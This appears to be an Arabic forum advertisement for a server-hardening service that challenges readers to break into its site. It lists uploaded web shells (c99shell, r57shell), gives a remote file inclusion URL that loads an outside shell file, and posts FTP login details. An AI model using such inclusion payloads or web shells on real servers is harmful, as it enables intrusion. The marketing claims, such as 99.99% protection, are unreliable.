تحديث المنتدى للإصدار المحمي<BR>
تغيير رقم userid لصاحب المنتدى<BR>
إستخدام سكربتات من برمجتنا الخاصه .. لمنع بعض الأكواد ومنع تشغيل الشلات<BR>
فحص الموقع للتأكد من خلوه من السكربتات اللتي تحتوي على ثغرات كـ RFI و SQL و XSS وغيرها<BR><BR> <BR> <BR> <BR>
لو نبي نتكلم عن اقل شيء نقدر نسويه .. <BR>
هذه صوره للشل تطلع على جميع مواقعك لو كنت صاحب سيرفر<BR> <BR>
http://www.sec-gate.com/1s.jpg<BR>
( صوره لشل على موقعنا )<BR> <BR>
وبعد فتح داله واحده فقط .. اصبح الشل هكذا<BR>
http://www.sec-gate.com/2ss.jpg<BR> <BR> <BR>
او نستطيع عمل صفحة لتحويل الشل عليها عند الدخول عليه واخذ المعلومات وإرسالها بالتقرير<BR> <BR>
http://www.sec-gate.com/g.jpg<BR> <BR>
هل لاحظت شيء ؟<BR>
الوضع الآمن فعال .. لكن بدون دوال معطلة<BR> <BR>
في الحقيقة تم تعطيل 100 دالة تقريباَ + تشغيل السيف مود + تركيب سكربت لتعديل الدوال من برمجتنا<BR>
100 دالة .. بدون اي مشاكل لا للسكربتات ولا للمنتديات .. تم تجربة الدوال وتصفيتها أكثر من مرة<BR> <BR> <BR>
ومثال على حمايتنا .. هذا تقييم الحماية .. والتقييم تم من قبل برنامج CSF اول ماتركب على السيرفر<BR>
http://www.sec-gate.com/2.jpg<BR>
( والحماية عندنا 99.99% -- مافي شيء في العالم كامل .. الكامل الله سبحانه -- )<BR>
( تقييم CSF )<BR>
+<BR>
ضمان سنه كامله<BR>
+<BR>
دعم فني متواصل<BR>
+<BR>
http://www.sec-gate.com/prices.html<BR>
أسعار لا تتجاوز 600 ريال سعودي للسيرفر<BR> <BR>
+<BR>
لدينا خدمات اخرى .. مثل<BR>
المراقبة 24/7<BR>
المتابعة الدورية<BR>
التقارير النصية او البيانية<BR>
منع الفلود والسبام<BR>
خدمة سكربتات بوابة الحماية<BR> <BR>
وهذه الوصلات ايضاً جزء مما نقدمه لحماية المواقع :<BR>
http://www.sec-gate.com/website-reseller.html<BR>
ولحماية المنتديات :<BR>
http://www.sec-gate.com/vb.html<BR> <BR>
وايضاً .. من خدماتنا .. إعداد السيرفر وتجهيزه<BR>
والبحث عن اسباب زيادة اللود<BR>
صور لسرعة سيرفرنا بعد عملية الإعداد وتقليل اللود<BR> <BR>
http://www.sec-gate.com/b.jpg<BR> <BR>
من خدماتنا إعداد السيرفر وتجهيزه وحمايته .. والبحث عن اسباب زيادة اللود وغيرها<BR> <BR>
هذه الصوره بعد أكثر من فحص .. الأول كان : 0.52 والثاني كان : 0.38 والثالث : 0.45<BR>
وتم اختيار المتوسط<BR>
مع العلم ان النتائج الثلاث كلها أسرع من قوقل ..والسيرفر يحتوي على صفحات وصور في الصفحة الرئيسية<BR>
أكثر من صفحات وصور قوقل في الصفحة الرئيسيه<BR>
ويحتوي على أكثر من موقع ومنتدى<BR> <BR>
صور اخرى :<BR> <BR>
http://www.sec-gate.com/d.JPG<BR> <BR>
مقارنة بين السيرفر وبين قوقل<BR>
http://www.sec-gate.com/aaa.jpg<BR>
عدم تمكنك من عرض اليوزرات .. مثل<BR>
http://67.222.1.67/~root<BR> <BR> <BR>
الآن :<BR>
شل على موقعنا :<BR>
http://www.sec-gate.com/a2.php<BR> <BR>
ثغرة على موقعنا :<BR>
http://www.sec-gate.com/order.php?showlink=1&fid=8&p=links&area=1&categ=http://www.sec-gate.com/a2.txt<BR>
تقدر تستخدم شل بديل مثل <BR>
http://www.sec-gate.com/order.php?showlink=1&fid=8&p=links&area=1&categ=http://www.geocities.com/helloooaja/cmd.txt<BR> <BR> <BR> <BR>
الشل المرفوع سابقاً .. تم إستثناءه من الفايروول<BR>
لكن تم رفع 3 شلات .. ولم يتم استثنائها<BR> <BR>
هل بإمكانك الدخول عليها ؟<BR> <BR>
http://www.sec-gate.com/c99shell.php<BR>
http://www.sec-gate.com/sniper_sa2.php<BR>
http://www.sec-gate.com/r57shell.php<BR> <BR>
ملف خاطئ : لإثبات ان الملفات السابقه مرفوعه <BR>
http://www.sec-gate.com/oj.php<BR> <BR>
ملاحظه :<BR>
صفحة security.php .. هي مجرد مثال ..بمعنى انها لا تسجل معلوماتك <BR> <BR>
عملاء الاسبوع : ( حماية ) <BR>
http://www.takempire.com<BR>
http://www.d45d.com<BR>
http://www.b84b.com/vb<BR>
http://www.etsalati.com/vb<BR>
http://www.almadaya.com<BR>
http://www.bnatqtr.com/vb<BR>
http://www.al-mjd.com<BR>
http://www.fdool.com/vb<BR>
http://www.altayyar.net/vb<BR> <BR>
بإمكانك الإطلاع على المزيد من خلال زيارة موقعنا<BR>WWW.SEC-GATE.COM (<A href='http://www.SEC-GATE.com)[/CENTER'>http://www.SEC-GATE.com"]WWW.SEC-GATE.COM[/URL][/CENTER</A>]<BR> <BR>
قريباً .. تصميم جديد للموقع<BR> <BR>
الأسعار :<BR>
http://www.sec-gate.com/pN.jpg<BR> <BR> <BR>
وللطلب (رسالة ) :<BR>
sales@sec-gate.com (<A href='mailto:sales@sec-gate.com)[/CENTER'>sales@sec-gate.com"]sales@sec-gate.com[/EMAIL][/CENTER</A>]<BR> <BR> <BR>الاسبوع هذا .. تم تطوير مايلي :<BR>1- سكربت لفحص تغيرات الاندكسات وإرسال تنبيه لأصحابها والروت<BR>2- سكربت لإيقاف الشلات الضاره phpshells<BR>3- إيقاف أوامر perl الضاره .. بدون إيقاف سكربتات البيرل لكي لاتأثر على الـ cpanel<BR>4- تعطيل جميع الثغرات والشلات مع تحويلها لصفحة أمان وجمع معلومات الشخص اللذي حاول تجربتها<BR>5- بورت ssh متغير وغير ثابت<BR>6- رولز جديده للمود سكيورتي لإيقاف جميع انواع الثغرات من تطويرنا <BR>7- تشفير الـ config.php بتقنية جديده غير الزند لكي لايتم كسرها <BR> <BR>والمزيد ...<BR> <BR> <BR> <BR>[CENTER]واخيراً<BR> <BR>
يسألني اكثر من شخص .. يقولي ليه الشل اللي كنت رافعه تم تعديله ؟<BR> <BR> <BR> <BR>
وفي الحقيقه الشل لم يتم تعديل ولا حرف فيه<BR> <BR> <BR> <BR> <BR>
هذه معلومات الاف تي بي<BR> <BR> <BR> <BR>
FTP Username:traidnt@sec-gate.com</P>
<P>
FTP Password: 123456<BR>[CENTER]FTP Server: ftp.sec-gate.com<BR>
FTP Server Port: 21<BR></P>
<P> <BR> <BR> <BR> <BR>
Path : http://www.sec-gate.com/traidnt<BR> <BR> <BR> <BR> <BR> <BR>
مواقع على نفس السيرفر :<BR> <BR> <BR> <BR>
http://www.sec-gate.com</P>
<P>
http://www.hack-gate.com</P>
<P> <BR> <BR>
مع تحياتنا<BR>
فريق بوابة الحماية الأمني | Security Gate Team </P>